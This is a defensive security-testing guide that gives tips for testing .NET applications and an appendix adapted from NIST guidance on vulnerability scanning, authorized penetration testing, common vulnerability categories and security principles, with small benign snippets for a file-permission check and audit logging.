Security testing is unlike ordinary application testing. The security tester looks for ways to subvert the security of an application prior to its deployment. Effective security testing can significantly reduce the number of security defects in an application and can highlight flaws in the application design.
These are my suggestion to test your .NET Application:
• Play the part of the employee.
Do not limit your simulated attacks to those you expect a hacker to make. Be sure to determine whether it is possible for a disgruntled employee to subvert the application security. Employees are usually assigned more trust in an application security model, which can sometimes provide easier routes of attack.

• Test beyond the application itself.
Your testing should include attacks on the system on which the application depends, including database, directory, and email servers. In the case of .NET, you should also see if you can subvert your application via an attack on the runtime components. Poor configuration or a poor understanding of security functionality can often provide an avenue for an attack that can subvert the application indirectly.

• Test beyond the application design.
Do not fall into the trap of simply testing to ensure that the application design has been correctly implemented; this is functional testing, and it does not offer many insights into security failures. Monitor trends in general attack strategies. Expand your range of simulated attacks by monitoring the way real attacks are performed. Your customers may furnish you with descriptions of attacks they have seen, and you can learn from the way other applications and services are attacked.


Appendix 3 Testing Internet Connected Systems

(Appendix 3 guidelines taken from [NIST] National Institute of Standards and Technology http://csrc.nist.gov and http://csrc.nist.gov/publications/nistpubs)

Introduction

Technology and information systems such as the Internet have brought many changes in the way organizations and individuals conduct business, and it would be difficult to operate effectively without the added efficiency and communications they provide. At the same time, the Internet has brought problems in the form of intruder attacks, both manual and automated, which can cost organizations excessive amounts of money in damages and lost efficiency. Thus, organizations need methods for achieving their mission goals using information systems while at the same time keeping those systems secure from attack.

Security testing is perhaps the most conclusive determinant of whether a system is configured and continues to be configured to the correct security controls and policy. The types of testing described in this document are meant to assist network and system administrators and related security staff in keeping their systems operationally secure and resistant as much as possible to attack. These testing activities, if made part of standard system and network administration, can be highly cost-effective in preventing incidents and uncovering unknown vulnerabilities.

Security Testing and the System Development Life Cycle
Evaluation of system security can and should be conducted at different stages of system development. Security evaluation activities include, but are not limited to, risk assessment, certification and accreditation (C&A), system audits, and security testing at appropriate periods during a system’s life cycle. These activities are geared toward ensuring that the system is being developed and operated in accordance with an organization’s security policy. This section discusses how network security testing, as a security evaluation activity, fits into the system development life cycle.
A typical system lifecycle would include the following activities:
• Initiation – the system is described in terms of its purpose, mission, and configuration.
• Development and Acquisition – the system is possibly contracted and constructed according to documented procedures and requirements.
• Implementation and Installation – the system is installed and integrated with other applications, usually on a network.
• Operational and Maintenance – the system is operated and maintained according to its mission requirements.
• Disposal – the system’s lifecycle is complete and it is deactivated and removed from the network and active use.
Implementation Stage
During the Implementation Stage, Security Testing and Evaluation should be conducted on particular parts of the system and on the entire system as a whole. Security Test and Evaluation (ST&E) is an examination or analysis of the protective measures that are placed on an information system once it is fully integrated and operational.

The objectives of the ST&E are to:

• Uncover design, implementation and operational flaws that could allow the violation of security policy

• Determine the adequacy of security mechanisms, assurances and other properties to enforce the security policy

• Assess the degree of consistency between the system documentation and its implementation.


The scope of an ST&E plan typically addresses computer security, communications security, emanations security, physical security, personnel security, administrative security, and operations security.

Operational Stage

Once a system is operational, it is important to ascertain its operational status, that is, “…whether a system is operated according to its current security requirements. This includes both the actions of people who operate or use the system and the functioning of technical controls.”[nist2] The types of tests selected and the frequency in which they are conducted depend on the importance of the system and the resources available for testing. These tests, however, should be repeated periodically and whenever a major change is made to the system. For systems that are exposed to constant threat (e.g., web servers) or that protect critical information (e.g., firewalls), testing should be conducted more frequently.

During the Maintenance Stage, ST&E testing may need to be conducted just as it was during the Implementation Stage. This level of testing may also be required before the system can be returned to its operational state, depending upon the criticality of the system and its applications. For example, an important server or firewall may require full testing, whereas a desktop system may not.


Security Testing Techniques

There are several different types of security testing. The following section describes each testing technique, and provides additional information on the strengths and weakness of each. Some testing techniques are predominantly manual, requiring an individual to initiate and conduct the test. Other tests are highly automated and require less human involvement. Regardless of the type of testing, staff that setup and conduct security testing should have significant security and networking knowledge, including significant expertise in the following areas: network security, firewalls, intrusion detection systems, operating systems, programming and networking protocols.

Often, several of these testing techniques are used together to gain more comprehensive assessment of the overall network security posture. For example, penetration testing usually includes network scanning and vulnerability scanning to identify vulnerable hosts and services that may be targeted for later penetration. Some vulnerability scanners incorporate password cracking. None of these tests by themselves will provide a complete picture of the network or its security posture. After running any tests, certain procedures should be followed, including documenting the test results, informing system owners of the results, and ensuring that vulnerabilities are patched or mitigated.

Roles and Responsibilities for Testing
Only designated individuals, including network administrators or individuals contracted to perform the network scanning as part of a larger series of tests, should conduct the tests described in this section. The approval for the tests may need to come from as high as the CIO, depending on the extent of the testing. It would be customary for the testing organization to alert other security officers, management, and users that network mapping is taking place. Since a number of these tests mimic some of the signs of an attack, the appropriate managers must be notified to avoid confusion and unnecessary expense. In some cases, it may be wise to alert local law enforcement officials if, for example, the security policy includes notifying law enforcement.

Vulnerability Scanning
Vulnerability scanners take the concept of a port scanner to the next level. Like a port scanner, a vulnerability scanner identifies hosts and open ports, but it also provides information on the associated vulnerabilities (as opposed to relying on human interpretation of the results). Most vulnerability scanners also attempt to provide information on mitigating discovered vulnerabilities. Vulnerability scanners provide system and network administrators with proactive tools that can be used to identify vulnerabilities before an adversary can find them. A vulnerability scanner is a relatively fast and easy way to quantify an organization's exposure to surface vulnerabilities. A surface vulnerability is a weakness as it exists in isolation, independent from other vulnerabilities. The difficulty in identifying the risk level of vulnerabilities is that they rarely exist in isolation. For example, there could be several "low risk" vulnerabilities on a particular network that, when combined, present a high risk. A vulnerability scanner would generally not recognize the danger of the combined vulnerabilities and would thus assign a low risk to them, leaving the network administrator with a false sense of confidence in his or her security measures. The reliable way to identify the risk of vulnerabilities in aggregate is through penetration testing.

Vulnerability scanners attempt to identify vulnerabilities in the hosts scanned. Vulnerability scanners can also help identify out-of-date software versions, applicable patches or system upgrades, and validate compliance with, or deviations from, the organization's security policy. To accomplish this, vulnerability scanners identify operating systems and major software applications running on hosts and match them with known exposures. Scanners employ large databases of vulnerabilities to identify flaws associated with commonly used operating systems and applications. The scanner will often provide significant information and guidance on mitigating discovered vulnerabilities. In addition, vulnerability scanners can automatically make corrections and fix certain discovered vulnerabilities. This assumes that the operator of the vulnerability scanner has "root" or administrator access to the vulnerable host. However, vulnerability scanners have some significant weaknesses. Generally, they only identify surface vulnerabilities and are unable to address the overall risk level of a scanned network. Although the scan process itself is highly automated, vulnerability scanners can have a high false positive error rate (reporting vulnerabilities when none exist). This means an individual with expertise in networking, operating system security, and administration must interpret the results.

Since vulnerability scanners require more information than port scanners to reliably identify the vulnerabilities on a host, vulnerability scanners tend to generate significantly more network traffic than port scanners. This may have a negative impact on the hosts or network being scanned or network segments through which scanning traffic is traversing. Many vulnerability scanners also include tests for denial of service (DoS) attacks that, in the hands of an inexperienced tester, can have a considerable negative impact on scanned hosts.

Another significant limitation of vulnerability scanners is that they rely on constant updating of the vulnerability database in order to recognize the latest vulnerabilities. Before running any scanner, organizations should install the latest updates to its vulnerability database. Some vulnerability scanner databases are updated more regularly than others. The frequency of updates should be a major consideration when choosing a vulnerability scanner.

Vulnerability scanners are better at detecting well-known vulnerabilities than the more esoteric ones, primarily because it is difficult to incorporate all known vulnerabilities in a timely manner. Also, manufacturers of these products keep the speed of their scanners high (detecting more vulnerabilities requires more tests, which slows the overall scanning process).

Vulnerability scanners can be of two types: network-based scanners and host-based scanners. Network-based scanners are used primarily for mapping an organization's network and identifying open ports and related vulnerabilities. In most cases, these scanners are not limited by the operating system of targeted systems. The scanners can be installed on a single system on the network and can quickly locate and test numerous hosts. Host-based scanners have to be installed on each host to be tested and are used primarily to identify specific host operating system and application misconfigurations and vulnerabilities. Because host-based scanners are able to detect vulnerabilities at a higher degree of detail than network-based scanners, they usually require not only host (local) access but also a “root” or administrative account. Some host-based scanners offer the capability of repairing misconfigurations.

Organizations should conduct vulnerability scanning to validate that operating systems and major applications are up to date on security patches and software versions. Vulnerability scanning is a somewhat labor-intensive activity that requires a high degree of human involvement in interpreting the results. It may also disrupt network operations by taking up bandwidth and slowing response times. However, vulnerability scanning is extremely important for ensuring that vulnerabilities are mitigated before they are discovered and exploited by adversaries. Vulnerability scanning should be conducted at least quarterly to semi-annually. Highly critical systems such as firewalls, public web servers, and other perimeter points of entry should be scanned nearly continuously. Since no vulnerability scanner can detect all vulnerabilities, it is also recommended that more than one be used. A common practice is to use a commercially available scanner and a freeware scanner. Vulnerability scanning results should be documented and discovered deficiencies corrected.

Penetration Testing

Penetration testing is security testing in which evaluators attempt to circumvent the security features of a system based on their understanding of the system design and implementation. The purpose of penetration testing is to identify methods of gaining access to a system by using common tools and techniques used by attackers. Penetration testing should be performed after careful consideration, notification, and planning.

Penetration testing can be an invaluable technique for any organization's information security program. However, it is a very labor-intensive activity and requires great expertise to minimize the risk to targeted systems. At a minimum, it may slow the organization's network response times due to network scanning and vulnerability scanning. Furthermore, the possibility exists that systems may be damaged in the course of penetration testing and may be rendered inoperable, even though the organization benefits in knowing that the system could have been rendered inoperable by an intruder. Although this risk is mitigated by the use of experienced penetration testers, it can never be fully eliminated.

Penetration testing can be overt or covert. These two types of penetration testing are commonly referred to as Blue Teaming and Red Teaming. Blue Teaming involves performing a penetration test with the knowledge and consent of the organization's IT staff. Red Teaming involves performing a penetration test without the knowledge of the organization's IT staff but with the full knowledge and permission of upper management. Some organizations designate a trusted third party for Red Teaming exercises to ensure that the organization does not initiate response measures associated with a real attack without first verifying that an attack is indeed under way (i.e., that the activity being seen does not originate from an exercise). The trusted third party provides an agent for the testers, the management, and the IT and security staff that mediates the activities and facilitates communications. This type of test is useful for testing not only network security, but also the IT staff's response to perceived security incidents and their knowledge and implementation of the organization's security policy. Red Teaming may be conducted with or without warning.

Of the two types of penetration tests, Blue Teaming is the less expensive and more frequently used. Red Teaming, because of its stealth requirements, requires more time and expense. To operate stealthily, a Red Team will have to slow its scans and other actions to stay below the threshold at which the target organization’s intrusion detection system (IDS) and firewall can detect them. However, Red Teaming provides a better indication of the everyday security of the target organization, since system administrators will not be on heightened awareness.

A penetration test can be designed to simulate an inside and/or an outside attack. If both internal and external testing are to be performed, the external testing usually occurs first. With external penetration testing, firewalls usually limit the amount and types of traffic that are allowed into the internal network from external sources. Depending on what protocols are allowed through, initial attacks are generally focused on commonly used and allowed application protocols such as FTP, HTTP, or SMTP and POP.

To simulate an actual external attack, the testers are not provided with any real information about the target environment other than targeted IP addresses/ranges, and they must covertly collect information before the attack. They collect information on the target from public web pages, newsgroups, and similar sources. They then use port scanners and vulnerability scanners to identify target hosts. Since they are most likely going through a firewall, the amount of information they can gather is far less than if they were operating internally. After identifying hosts on the network that can be reached from the outside, they attempt to compromise one of them. If successful, they then leverage this access to compromise other hosts not generally accessible from outside. This is why penetration testing is an iterative process that leverages minimal access to gain greater access.

An internal penetration test is similar to an external test, except that the testers are now on the internal network (i.e., behind the firewall) and are granted some level of access to the network (generally as a user but sometimes at a higher level). The penetration testers then try to gain a greater level of access to the network through privilege escalation. The testers are provided with the information about the network that somebody with their assigned privileges would normally have, generally that of a standard employee, although it can also be anything up to and including a system or network administrator, depending on the goals of the test.

While vulnerability scanners only check that a vulnerability may exist, the attack phase of a penetration test exploits the vulnerability, confirming its existence. Most vulnerabilities exploited by penetration testing and malicious attackers fall into the following categories:

• Kernel Flaws—Kernel code is the core of an operating system. The kernel code enforces the overall security model for the system. Any security flaw that occurs in the kernel puts the entire system in danger.
• Buffer Overflows—A buffer overflow occurs when programs do not adequately check input for appropriate length, which is usually a result of poor programming practice. When this occurs, arbitrary code can be introduced into the system and executed with the privileges of the running program. This code often can be run as root on Unix systems and SYSTEM (administrator equivalent) on Windows systems.
• Symbolic Links—A symbolic link or symlink is a file that points to another file. Often there are programs that will change the permissions granted to a file. If these programs run with privileged permissions, a user could strategically create symlinks to trick these programs into modifying or listing critical system files.
• File Descriptor Attacks—File descriptors are nonnegative integers that the system uses to keep track of files rather than using specific filenames. Certain file descriptors have implied uses. When a privileged program assigns an inappropriate file descriptor, it exposes that file to compromise.
• Race Conditions—A race condition can occur during the window of time between when a program or process enters a privileged mode and when it gives that privileged mode up. An attacker can time an attack to take advantage of the program or process while it is still in the privileged mode. If the attacker successfully compromises the program or process during its privileged state, the attacker has won the “race.” Common race conditions include signal handling and core-file manipulation.
• File and Directory Permissions—File and directory permissions control the access users and processes have to files and directories. Appropriate permissions are critical to the security of any system. Poor permissions could allow any number of attacks, including the reading or writing of password files or the addition of hosts to the list of trusted remote hosts.
• Trojans—Trojan programs can be custom built or could include programs such as BackOrifice, NetBus, and SubSeven. Kernel root kits could also be employed once access is obtained to allow a backdoor into the system at any time.
• Social Engineering—Social engineering is the technique of using persuasion and/or deception to gain access to, or information about, information systems. It is typically carried out through human conversation or other interaction, usually by telephone but also by e-mail or even face-to-face. Social engineering generally follows two standard approaches. In the first, the penetration tester poses as a user experiencing difficulty and calls the organization’s help desk in order to gain information on the target network or host, obtain a login ID and credentials, or get a password reset. In the second, the tester poses as the help desk and calls a user in order to get the user to provide his/her user ID(s) and password(s). This technique can be extremely effective.
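Several of the categories above can be probed programmatically. As one sketch, for the file and directory permissions category, a host-based check for world-writable files might look like the following (POSIX permission bits only; an illustrative example, not a complete audit):

```python
import os
import stat

def world_writable(path):
    """Return True if `path` grants write permission to all users.

    World-writable files and directories are a classic permissions
    weakness that host-based scanners and penetration testers look for.
    """
    mode = os.stat(path).st_mode
    return bool(mode & stat.S_IWOTH)
```

A host-based scanner would walk the file system applying checks like this one, along with checks for setuid binaries, weak ownership, and similar misconfigurations.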
A penetration test proceeds through planning, discovery, attack, and reporting phases. In the planning phase, rules of engagement, test plans, and written permission are developed. In the discovery and attack phases, written logs are usually kept and periodic reports are made to system administrators and/or management, as appropriate. Generally, at the end of the test an overall report is developed to describe the identified vulnerabilities, provide a risk rating, and give guidance on mitigating the discovered weaknesses.

Penetration testing is important for determining how vulnerable an organization's network is and the level of damage that can occur if the network is compromised. Because of the high cost and potential impact, annual penetration testing may be sufficient. The results of penetration testing should be taken very seriously, and discovered vulnerabilities should be mitigated. As soon as they are available, the results should be presented to the organization’s managers.

Corrective measures can include closing discovered and exploited vulnerabilities, modifying an organization's security policies, creating procedures to improve security practices, and conducting security awareness training for personnel to ensure that they understand the implications of poor system configurations and poor security practices. Organizations should consider conducting less labor-intensive testing activities on a regular basis to ensure that they are in compliance with their security policies and are maintaining the required security posture. If an organization performs other tests (e.g., network scanning and vulnerability scanning) regularly between the penetration testing exercises and corrects discovered deficiencies, it will be well prepared for the next penetration testing exercise and for a real attack.

Post-Testing Actions
For most organizations, testing will likely reveal issues that need to be addressed quickly. How these issues are addressed and mitigated is the most important step in the testing process. The most common root cause, and perhaps the single largest contributor to poorly secured systems, is the lack of an organizational security policy (or one that is poorly enforced). A security policy is important because it ensures consistency, and consistency is a critical component of a successful security posture because it leads to predictable behavior. This makes it easier for an organization to maintain secure configurations and assists in identifying security problems (which often manifest themselves as deviations from predictable, expected behavior). Each organization needs to have a security policy and to communicate that policy to users and administrators.

Software (Un)Reliability

Many successful attacks exploit errors (“bugs”) in the software code used on computers and networks. Organizations can minimize the problems caused by software errors in several ways. For code developed in-house, proper procedures for code development and testing should be implemented to ensure the appropriate level of quality control. The organization will have less control over the quality of code purchased from outside vendors. To mitigate this risk, organizations should regularly check for updates and patches from vendors and apply them in a timely manner. When considering the purchase of commercially produced software, organizations should check vulnerability databases (e.g., http://icat.nist.gov) and examine the past performance of the vendor’s software (although past performance may not always be an accurate indicator of future performance).

General Information Security Principles

When addressing security issues, some general information security principles should be kept in mind [Curtin 01], as follows:

• Simplicity—Security mechanisms (and information systems in general) should be as simple as possible. Complexity is at the root of many security issues.

• Fail-Safe—If a failure occurs, the system should fail in a secure manner. That is, if a failure occurs, security should still be enforced. It is better to lose functionality than lose security.

• Complete Mediation—Rather than providing direct access to information, mediators that enforce access policy should be employed. Common examples include file system permissions, web proxies, and mail gateways.

• Open Design—System security should not depend on the secrecy of the implementation or its components. “Security through obscurity” does not work.

• Separation of Privilege—Functions, to the degree possible, should be separate and provide as much granularity as possible. The concept can apply to both systems and operators/users. In the case of system operators and users, roles should be kept as separate as possible. For example, if resources allow, the role of system administrator should be separate from that of the security administrator.

• Psychological Acceptability—Users should understand the necessity of security. This can be provided through training and education. In addition, the security mechanisms in place should present users with sensible options that give them the usability they require on a daily basis. If users find the security mechanisms too cumbersome, they will find ways to work around or compromise them. An example is requiring random passwords that are very strong but difficult to remember; users may write them down or look for ways to circumvent the policy.

• Layered Defense—Organizations should understand that any single security mechanism is generally insufficient. Security mechanisms (defenses) need to be layered so that compromise of a single security mechanism is insufficient to compromise a host or network. There is no “magic bullet” for information system security.

• Compromise Recording—When systems and networks are compromised, records or logs of that compromise should be created. This information can assist in securing the network and host after the compromise and assist in identifying the methods and exploits used by the attacker. This information can be used to better secure the host or network in the future. In addition, this can assist organizations in identifying and prosecuting attackers.
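As a minimal sketch of compromise recording, security-relevant events can be routed through a dedicated audit log. The logger name, log file name, and example event below are illustrative assumptions using Python's standard logging module:

```python
import logging

# A dedicated logger with its own file handler, so that a record of
# security-relevant events survives for post-compromise analysis.
audit = logging.getLogger("security.audit")
audit.setLevel(logging.INFO)

handler = logging.FileHandler("security_audit.log")
handler.setFormatter(
    logging.Formatter("%(asctime)s %(levelname)s %(message)s"))
audit.addHandler(handler)

# Example event: a failed login attempt (values are illustrative).
audit.info("failed login for user %s from %s", "alice", "203.0.113.7")
```

Forwarding such logs to a separate host makes them harder for an attacker to alter or destroy after a compromise.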